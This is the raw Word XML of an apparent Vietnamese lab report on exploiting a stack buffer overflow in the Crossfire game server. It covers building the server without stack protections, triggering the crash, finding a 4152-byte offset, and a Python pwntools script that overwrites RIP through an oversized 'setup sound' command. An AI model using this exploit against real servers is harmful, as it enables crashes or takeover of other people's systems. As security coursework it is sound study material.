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66C91" w14:textId="580698AF" w:rsidR="00E15FAA" w:rsidRDefault="003F70AA">
      <w:r>
        <w:t xml:space="preserve">Báo cáo </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101C5B9A" w14:textId="7581EE4D" w:rsidR="003130DF" w:rsidRDefault="003130DF">
      <w:r>
        <w:t xml:space="preserve">Cài đặt: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149FF936" w14:textId="4950F186" w:rsidR="00BB7E5D" w:rsidRDefault="00BB7E5D">
      <w:r>
        <w:t>Gõ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B29AE40" w14:textId="68ED5FD2" w:rsidR="00BB7E5D" w:rsidRPr="00BB7E5D" w:rsidRDefault="00BB7E5D" w:rsidP="00BB7E5D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" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB7E5D">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>export CC="gcc -fno-stack-protector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB7E5D">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-D_FORTIFY_SOURCE=0 -z execstack -no-pie -Wl,-z,norelro";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6815C28E" w14:textId="1377601D" w:rsidR="00BB7E5D" w:rsidRDefault="00BB7E5D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65AEFE24" w14:textId="346C03EE" w:rsidR="00BB7E5D" w:rsidRDefault="00BB7E5D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Gõ: ./configure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDF8233" w14:textId="3EE68FDD" w:rsidR="00BB7E5D" w:rsidRDefault="00BB7E5D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Gõ: make</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E29E309" w14:textId="3975F9D1" w:rsidR="00BB7E5D" w:rsidRDefault="00BB7E5D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Gõ: make check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFD923A" w14:textId="3567C526" w:rsidR="00BB7E5D" w:rsidRPr="00BB7E5D" w:rsidRDefault="00BB7E5D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Gõ: sudo make install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711FDE9C" w14:textId="4C2E4547" w:rsidR="003F70AA" w:rsidRDefault="003F70AA">
      <w:r>
        <w:t>12.2.1.2 crash crossfire server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26248E42" w14:textId="5F0D48B7" w:rsidR="0014057D" w:rsidRDefault="0014057D">
      <w:r>
        <w:t>Trigger bug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C504B31" w14:textId="75DE1E18" w:rsidR="003F70AA" w:rsidRDefault="003F70AA">
      <w:r w:rsidRPr="003F70AA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05316622" wp14:editId="6F6F5D85">
            <wp:extent cx="5099559" cy="4584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0620" cy="45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78CE8" w14:textId="77777777" w:rsidR="00BB7E5D" w:rsidRDefault="00BB7E5D"/>
    <w:p w14:paraId="65356345" w14:textId="1E63AD2E" w:rsidR="0014057D" w:rsidRDefault="00744524">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Rip overwrite with malicious </w:t>
      </w:r>
      <w:r w:rsidR="0012668F">
        <w:t>buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E18943" w14:textId="7E618DB9" w:rsidR="0012668F" w:rsidRDefault="00BD61ED">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F86E3F2" wp14:editId="59C43C3E">
            <wp:extent cx="5943600" cy="4046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E044A" w14:textId="315AB2CC" w:rsidR="00B26B89" w:rsidRDefault="0006558C">
      <w:r>
        <w:t>Offset of payload:  41</w:t>
      </w:r>
      <w:r w:rsidR="00F95146">
        <w:t>52</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C581712" w14:textId="25327CCB" w:rsidR="0006558C" w:rsidRDefault="00F95146">
      <w:r w:rsidRPr="00F95146">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CEA33EA" wp14:editId="5FD66C60">
            <wp:extent cx="3749365" cy="525826"/>
            <wp:effectExtent l="0" t="0" r="3810" b="762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0C45F" w14:textId="5EB178AA" w:rsidR="0006558C" w:rsidRDefault="00896F46">
      <w:r>
        <w:t xml:space="preserve">Cách debug: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596F030C" w14:textId="20D8BF31" w:rsidR="00896F46" w:rsidRDefault="00896F46">
      <w:r>
        <w:t>Break</w:t>
      </w:r>
      <w:r w:rsidR="006641F7">
        <w:t xml:space="preserve"> tại</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SetU</w:t>
      </w:r>
      <w:r w:rsidR="003130DF">
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="006641F7">
        <w:t>+0</w:t>
      </w:r>
      <w:r w:rsidR="003130DF">
        <w:t>: lấy địa chỉ buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAB6407" w14:textId="2E6E4714" w:rsidR="003130DF" w:rsidRDefault="003130DF">
      <w:r>
        <w:t>Break tại SetUp+1028: lấy địa chỉ của lệnh pop rbp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DB0030" w14:textId="456AD45F" w:rsidR="003130DF" w:rsidRDefault="003130DF">
      <w:r>
        <w:t xml:space="preserve">Trừ </w:t>
      </w:r>
      <w:r w:rsidR="00BB7E5D">
        <w:t xml:space="preserve">nhau </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">là ra offset. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B41E71A" w14:textId="2EA935EA" w:rsidR="00BB7E5D" w:rsidRDefault="002004EE">
      <w:r>
        <w:t xml:space="preserve">Code : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F235151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04E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#!/usr/bin/python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F35608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04E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socket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sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A38674B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04E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from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pwn </w:t>
      </w:r>
      <w:r w:rsidRPr="002004EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="89DDFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>import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</w:p>
    <w:p w14:paraId="50DF81C9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982D82F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host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004EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="C3E88D"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>127.0.0.1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1BAC4696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offset1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04EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="F78C6C"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4152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2004EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="F78C6C"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>12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04EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4A4A4A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t># 12 bytes of command "setup sound "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1CB538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offset2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04EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="F78C6C"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4376</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5760FF2F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lastRenderedPageBreak/>
        <w:t xml:space="preserve">setuid_got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0x</w:t>
      </w:r>
      <w:r w:rsidRPr="002004EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="F78C6C"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>50b2a0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2A7FBF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setup_addr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0x</w:t>
      </w:r>
      <w:r w:rsidRPr="002004EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="F78C6C"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4ba730</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C739BC6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magic_ret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b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004EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="C3E88D"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>tuanlt24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\x00"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2BEF84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62908D11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overflow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b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"\x41"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*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offset1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E80B784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overflow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magic_ret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0D23D7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overflow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+=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>offset2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>offset1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-</w:t>
      </w:r>
      <w:r w:rsidRPr="002004EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="82AAFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>len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>magic_ret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))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*b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  <w:r w:rsidRPr="002004EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="C3E88D"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>A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'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12249D44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buffer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b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"\x11</w:t>
      </w:r>
      <w:r w:rsidRPr="002004EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="C3E88D"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">(setup sound 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overflow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+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b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"\x90\x00</w:t>
      </w:r>
      <w:r w:rsidRPr="002004EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="C3E88D"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>#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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B1E8FC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>s</w:t>
      </w:r>
      <w:r w:rsidRPr="002004E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remote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>host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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002004EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="F78C6C"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>13327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4143D6A0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>s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>sendline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>buffer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28D921D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04EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="82AAFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>print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("</w:t>
      </w:r>
      <w:r w:rsidRPr="002004EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="C3E88D"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[!] Payload sent!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")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2B4224" w14:textId="77777777" w:rsidR="002004EE" w:rsidRPr="002004EE" w:rsidRDefault="002004EE" w:rsidP="002004EE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>s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2004EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="EEFFFF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>close</w:t>
      </w:r>
      <w:r w:rsidRPr="002004E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52955697" w14:textId="77777777" w:rsidR="002004EE" w:rsidRPr="002004EE" w:rsidRDefault="002004EE" w:rsidP="002004EE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="212121"/>
        <w:spacing w:after="24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</w:p>
    <w:p w14:paraId="2C86263B" w14:textId="77777777" w:rsidR="002004EE" w:rsidRPr="003F70AA" w:rsidRDefault="002004EE"/>
    <w:sectPr w:rsidR="002004EE" w:rsidRPr="003F70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AA"/>
    <w:rsid w:val="0006558C"/>
    <w:rsid w:val="0012668F"/>
    <w:rsid w:val="0014057D"/>
    <w:rsid w:val="002004EE"/>
    <w:rsid w:val="003130DF"/>
    <w:rsid w:val="003F70AA"/>
    <w:rsid w:val="004B3809"/>
    <w:rsid w:val="006641F7"/>
    <w:rsid w:val="006C6C79"/>
    <w:rsid w:val="00744524"/>
    <w:rsid w:val="00896F46"/>
    <w:rsid w:val="00917506"/>
    <w:rsid w:val="009728AF"/>
    <w:rsid w:val="009E615D"/>
    <w:rsid w:val="00B26B89"/>
    <w:rsid w:val="00B724FB"/>
    <w:rsid w:val="00BB7E5D"/>
    <w:rsid w:val="00BD61ED"/>
    <w:rsid w:val="00C8218C"/>
    <w:rsid w:val="00E15FAA"/>
    <w:rsid w:val="00F9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9CB4F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BA5ADC3E-3E93-454B-BFC4-495680BF6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7E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7E5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6A81C6F98DB9499F55B95BB757EC5F" ma:contentTypeVersion="8" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="15187954b4c5ef7018f1a839a8597dec">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="51f29588-1891-457b-ae7e-ca608928196c" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="51b1d31b66a5a15645632b3c139c1f1b" ns3:_="">
    <xsd:import namespace="51f29588-1891-457b-ae7e-ca608928196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f29588-1891-457b-ae7e-ca60892819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21A2B55-9048-431C-B87C-1F131747E6FF}">
  <ds:schemaRefs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51f29588-1891-457b-ae7e-ca608928196c"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/terms/"/>
    <ds:schemaRef ds:uri="http://www.w3.org/XML/1998/namespace"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControl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517800B-478E-414C-AE0E-C21A631182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BE94FF-2935-4898-A43C-590F70E1BC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1f29588-1891-457b-ae7e-ca608928196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TUAN</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>LE TUAN</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <cp:lastPrinted>2022-09-03T18:06:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-09-03T18:07:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-09-03T18:07:00Z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0x010100296A81C6F98DB9499F55B95BB757EC5F</vt:lpwstr>
  </property>
</Properties>
</file>